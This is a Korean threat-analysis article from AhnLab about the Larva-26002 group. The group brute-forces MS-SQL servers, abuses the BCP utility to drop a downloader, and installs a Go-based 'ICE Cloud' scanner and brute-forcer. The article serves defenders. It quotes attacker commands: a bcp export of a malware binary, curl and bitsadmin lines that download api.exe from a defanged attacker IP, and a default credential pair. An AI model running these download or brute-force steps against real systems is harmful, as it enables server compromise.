• 스마트 파인더
    • Security Map
    • 견적 및 도입 문의
    • My Company
    • V3 Lite 다운로드
웹콘텐츠
네트워크 보안 ◦ 위협 분석 ◦ 위협 대응2026-03-24

취약한 계정 노린 무차별 대입, MS-SQL 공격 흐름 분석

2026년에도 Larva-26002 공격 그룹은 관리가 미흡한 MS-SQL 서버를 지속적으로 노리고 있다. 이들은 과거 랜섬웨어를 유포하는 것에서 나아가, 최근에는 감염 시스템의 제어 권한을 탈취하고 스캐너를 설치하는 방식으로 공격을 확장하고 있다. 

최근 확인된 공격에서는 고(Go) 언어 기반 ‘ICE Cloud Client’가 새롭게 사용된 점이 특징이다. 이번 사례는  BCP 유틸리티 악용과 무차별 대입 공격이 결합된 전형적인 침해 흐름을 보여준다. 해당 사례를 통해 MS-SQL 서버 대상 공격 방식과 대응 방안을 함께 살펴보자.



안랩은 Larva-26002 공격자가 올해도 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 공격을 지속하고 있음을 확인했다. 해당 공격자는 과거(2024년 1월) 트리고나(Trigona) 및 미믹(Mimic) 랜섬웨어를 유포한 이력이 있으며, 최근에는 감염 시스템의 제어권을 확보한 뒤 스캐너 악성코드를 설치하는 방식으로 공격 전략을 변화시키고 있다.


특히 이번 공격에서는 Go 언어로 제작된 스캐너 악성코드 ‘ICE Cloud Client’가 사용됐는데, 이는 MS-SQL 서버를 대상으로 추가 공격 대상을 탐색하는 스캐너이자 무차별 대입 공격(Brute Force) 도구로 동작한다.


MS-SQL 서버 대상 공격 방식과 특징

Larva-26002는 외부에 노출돼 있고 계정 정보가 취약한 MS-SQL 서버를 주요 표적으로 삼는다. 공격자는 무차별 대입 또는 사전(Dictionary) 공격을 통해 인증에 성공한 뒤, 시스템 정보 수집 명령을 수행한다. 


시스템 정보 수집에 사용하는 명령은 다음과 같다.


> hostname

> whoami

> ifconfig

> ifconfig /all

> netstat -an

> tasklist

> tasklist /FI “IMAGENAME eq sqlservr.exe” /FO CSV /NH


이후 공격자는 MS-SQL의 BCP(Bulk Copy Program) 유틸리티를 악용해 악성코드를 생성한다. BCP 유틸리티(bcp.exe)는 MS-SQL 서버에서 대량의 외부 데이터를 가져오거나 내보내는 데 사용되는 커맨드 라인 툴로, SQL 서버 테이블에 저장된 대량의 데이터를 로컬 파일로 저장하거나 로컬에 저장된 데이터 파일을 SQL 서버의 테이블로 내보낸다. 


공격자는 데이터베이스에 악성코드를 저장한 이후 BCP를 이용해 로컬에 파일로 생성하는 방식을 사용한다. 악성코드가 저장된 테이블인 "uGnzBdZbsi"에서 아래 명령을 이용해 로컬 경로로 악성코드를 내보냈다. “FODsOZKgAU.txt”는 포맷 정보를 포함한 포맷 파일이다.


> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\api.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”


[그림 1] BCP 유틸리티를 악용한 악성코드 생성


일부 환경에서는 BCP 대신 Curl, Bitsadmin, PowerShell 등을 활용해 외부에서 악성코드를 다운로드하는 방식도 병행된다. 이는 환경에 따라 유연하게 공격 방식을 변경하고 있음을 보여준다.


> curl -o “C:\programdata\api.exe” “hxxp://109.205.211[.]13/api.exe”

> bitsadmin /transfer job1 /download /priority high “hxxp://109.205.211[.]13/api.exe” “C:\programdata\api.exe”


[그림 2] PowerShell을 이용한 스캐너 악성코드 다운로드


ICE Cloud 스캐너의 동작 방식

BCP나 Curl, Bitsadmin을 통해 생성된 “api.exe”는 ‘ICE Cloud' 계열 악성코드를 설치하는 다운로더이다. 해당 파일이 실행되면 'ICE Cloud Launcher'를 통해 C&C 서버와 통신하고, 최종적으로 'ICE Cloud Client'를 다운로드 및 실행한다.


[그림 3] ICE Cloud Launcher 실행 로그


[그림 4] C&C 서버와의 인증 과정


이후 최종적으로 설치되는 ICE Cloud Client는 Go 언어로 개발된 스캐너이자 무차별 대입 공격 도구로, MS-SQL 서버를 대상으로 공격을 수행한다.

한편 ICE Cloud Launcher는 "-show9" 인자와 함께 실행하면 [그림 3]과 같은 실행 로그를 확인할 수 있다.


ICE Cloud Launcher는 C&C 서버에 [그림 4]와 같은 패킷을 전송해 인증하며 이후 다운로드 요청을 보내 ICE Cloud Client를 다운로드한다. 다운로드된 ICE Cloud Client는 동일 경로에 정상 프로그램으로 위장한 랜덤 파일명으로 생성되며, MS-SQL 서버를 대상으로 스캐닝 기능을 수행한다. 바이너리에 포함된 문자열은 터키어로 작성됐으며, 이외에도 사용된 이모지를 보면 제작자가 생성형 AI를 활용한 것으로 보인다. RDP 프로토콜의 경우 단순한 연결 테스트 기능은 존재하지만 스캐닝 명령은 아직 지원하지 않는 것으로 확인된다.


[그림 5] 터키어 문자열과 이모지


[그림 6] ICE Cloud Client 실행 로그


스캐너는 C&C 서버와의 인증 이후 등록 과정을 진행하며, 서버로부터 사전 공격 대상 MS-SQL 서버 목록과 함께 계정 정보(ID/PW)를 전달받는다. 이후 해당 정보를 이용해 스캐닝 대상 주소에 ID(ecomm)/PW(ecomm) 정보로 MS-SQL 인증을 시도하며 성공 결과를 C&C 서버에 전송한다.


[그림 7] C&C 서버로부터 전달받은 스캐닝 데이터


보안 시사점 및 대응 방안

MS-SQL 서버를 대상으로 한 공격은 여전히 계정 보안 취약점을 주요 침투 경로로 활용하고 있다. 특히 단순하거나 반복적인 비밀번호를 사용하는 경우, 무차별 대입 공격에 매우 취약하다.


따라서 관리자들은 다음과 같은 보안 조치를 반드시 수행해야 한다.


1) 추측이 어려운 복잡한 비밀번호 사용 및 주기적 변경

2) 외부에 노출된 데이터베이스 서버에 대한 접근 통제 강화

3) 방화벽 등 보안 장비를 통한 외부 접속 제한

4) V3 등 보안 솔루션을 최신 상태로 유지하여 악성코드 사전 차단


이와 같은 기본적인 보안 수칙이 지켜지지 않을 경우, 공격자는 동일한 방식으로 지속적인 침투를 시도할 가능성이 높다. MS-SQL 서버 보안 관리의 중요성과 함께, 정상 도구를 악용하는 공격 기법에 대한 지속적인 대비가 필요하다.




  • AhnLab
    콘텐츠마케팅팀
목록 보기

관련 콘텐츠

데모영상

[Demo] AhnLab AI PLUS - AI 에이전트가 수행하는 이벤트 및 영향도 분석

[Demo] AhnLab AI PLUS - AI 에이전트가 수행하는 이벤트 및 영향도 분석

데모영상

[Demo] AhnLab XDR – 실제 공격 시나리오 탐지 & 대응

[Demo] AhnLab XDR – 실제 공격 시나리오 탐지 & 대응

데모영상

[Demo] AhnLab TIP – AI를 활용한 Lazarus 공격 그룹 분석

[Demo] AhnLab TIP – AI를 활용한 Lazarus 공격 그룹 분석

데모영상

[Demo] AhnLab CPS PLUS – CPS 네트워크-엔드포인트 자산 가시성 확보

[Demo] AhnLab CPS PLUS – CPS 네트워크-엔드포인트 자산 가시성 확보

skip navigation
  • 메뉴
  • 본문
  • 하단 정보(링크)
  • 제품
    • AhnLab PLUS Platform
    • AhnLab Endpoint PLUS
      • 안티멀웨어
      • 엔드포인트 보호 플랫폼 (EPP)
      • 지능형 위협 대응
      • 엔드포인트 탐지 & 대응 (EDR)
      • 중소기업 보안
      • 모바일 보안
    • AhnLab Network PLUS
      • 차세대 방화벽 (ZTNA)
      • 차세대 방화벽
      • 디도스 방어
      • 네트워크 침입 방지 (IPS)
      • 지능형 위협 대응
      • 네트워크 위협 관리 (TMS)
    • AhnLab Cloud PLUS
      • 클라우드 워크로드 보안 (CWPP)
      • 클라우드 방화벽
      • 클라우드 IPS
      • 클라우드 네트워크 위협 관리
    • AhnLab Connect PLUS
      • 확장형 탐지 & 대응 (XDR)
      • 위협 인텔리전스 (TIP)
      • SOAR
    • AhnLab CPS PLUS
      • CPS 보안 통합 관리
      • OT 엔드포인트 보안
      • OT 가시성 및 위협 탐지
      • OT 휴대용 안티멀웨어
      • OT 방화벽
      • OT 일방향 데이터 전송
      • OT 지능형 위협 대응
      • IT 엔드포인트 보안
      • IT 안티멀웨어
      • CPS 위협 인텔리전스
    • AhnLab AI PLUS
    • 전체 제품 및 서비스
  • 서비스
    • AhnLab Service PLUS
      • 매니지드 탐지 & 대응 (MDR)
      • 보안관제
      • Professional Service
      • 디지털 포렌식
      • 클라우드 MSP
      • 정보보호컨설팅
      • 글로벌 파트너
    • 전체 제품 및 서비스
  • 솔루션
    • 랜섬웨어 보안
    • 하이브리드 클라우드 보안
    • 제로 트러스트
    • CPS 보안
    • SOC 고도화
    • 위협 탐지 & 대응 (TDR)
    • 디도스 방어
  • 구매
    • 견적 및 도입 문의
    • 스마트 파인더
    • 구매방식
    • 제품 정책
      • 소프트웨어
      • 네트워크
    • 전략 물자
    • 랜섬웨어 탐지 대응 통합 서비스 페이지 배너
  • 고객지원
    • 온라인 고객지원
      • 원격지원
      • 1:1상담
      • 전화상담 안내
      • FAQ
    • 기업 기술 교육
    • 위협정보 신고센터
    • 다운로드
    • 공지사항
  • 콘텐츠 센터
    • 콘텐츠 센터
      • 시큐리티 레터
      • 월간 安
    • ASEC
      • 위협정보
      • 위협 행위자 분류 체계
      • ASEC 보안권고문
      • ASEC 블로그
    • 하이라이트
      • 랜섬웨어 탐지·대응 통합 서비스
      • MITRE ATT&CK 평가 라운드 7
      • 안랩 창립 30주년
      • Frost Radar CPS 보안 리더
  • 파트너
my page
로그인회원가입
언어 선택

최근 검색어가 없습니다.

AhnLab

  • 회사소개
  • 투자정보
  • 채용정보
  • 사용권 약관
  • 개인정보처리방침
  • 이용약관
  • Contact Us
  • 사이트맵

기업정보

  • 대표이사 : 강석균
  • 사업자등록번호 : 214-81-83536
  • (우) 13493 경기도 성남시 분당구 판교역로 220
  • 통신판매신고번호 : 2012-경기성남-1189
  • 대표전화 : 031-722-8000
  • Fax : 031-722-8901
  • © AhnLab, Inc. All rights reserved.

News Letter

시큐리티 레터는 매주 놓쳐서는 안 될 보안 정보를,
월간 '安'은 매월 위협 분석과 보안 동향에 대한 깊이 있는 정보를 이메일로 보내드립니다.

뉴스레터 선택
뉴스레터
이용 동의
V3 엔진 버전OES : 2026.07.01.02SES : 2026.06.28.00
엔진 업데이트 바로가기
  • 카카오톡 채널 바로가기
  • 페이스북 바로가기
  • 링크드인 바로가기
  • 유튜브 바로가기